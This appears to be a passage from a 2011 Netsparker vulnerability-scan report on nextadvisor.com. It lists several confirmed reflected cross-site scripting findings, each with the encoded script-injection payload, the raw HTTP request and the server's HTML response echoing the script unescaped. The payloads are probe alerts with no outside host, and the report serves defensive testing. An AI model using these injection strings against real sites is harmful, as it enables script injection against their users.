<!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> 
<!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000178)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/audiobooks_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Audiobook Downloads and Rentals FAQ</h1> <p>Frequently Asked Questions about Audiobook Downloads and Rentals</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Audiobook Downloads and Rentals:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" 
value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="audiobooks"> <input type="hidden" name="FieldData4" 
..
- /auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E

/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000198)</script>

Request

GET /auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/auto_insurance/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6660
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", , Geico, 21st Century, Progressive, Esurance, Hartford AARP, Allstate, The Hartford" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/auto_insurance/'"--></style></script><script>netsparker(0x000198)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> 
<div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" 
class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000198)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && 
showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/auto_insurance_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Auto Insurance FAQ</h1> <p>Frequently Asked Questions about Auto Insurance</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Auto Insurance:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> 
<div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="auto_insurance"> <input type="hidden" name="FieldData4" 
..
- /auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E

/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enet..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x00019A)</script>

Request

GET /auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/auto_insurance/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6677
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", , Geico, 21st Century, Progressive, Esurance, Hartford AARP, Allstate, The Hartford" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/auto_insurance/index.php'"--></style></script><script>netsparker(0x00019A)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div 
class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> 
<li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00019A)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/auto_insurance_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Auto Insurance FAQ</h1> <p>Frequently Asked Questions about Auto Insurance</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Auto Insurance:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> 
<input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="auto_insurance"> <input type="hidden" name="FieldData4" 
..
- /credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E

/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x0001B0)</script>

Request

GET /credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_cards/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8493
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit card, credit cards, cash rebate, gas rebates, balance transfer, student credit cards, bad credit, TrueEarnings&#174; Card from Costco and American Express, Miles by Discover&#174; Card, Discover&#174; Open Road Card, American Express&#174; Premier Rewards Gold Card, Chase Sapphire<sup><small>SM</small></sup>, Blue<sup><small>SM</small></sup> from American Express, Chase Freedom&#174; $100 Bonus Cash Back Visa, Chase Freedom&#174; $100 Bonus Cash Back MasterCard, Discover&#174; More Card, Blue Cash&#174; from American Express, Blue Sky from American Express<sup><small>SM</small></sup>, Discover&#174; Motiva Card, Discover&#174; Student Card, Slate<sup><small>SM</small></sup> with Blueprint, Discover&#174; Student Open Road Card, Public Savings Bank Open Sky Secured Visa&#174;, PrePaid Visa&#174; RushCard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_cards/'"--></style></script><script>netsparker(0x0001B0)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction 
recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet 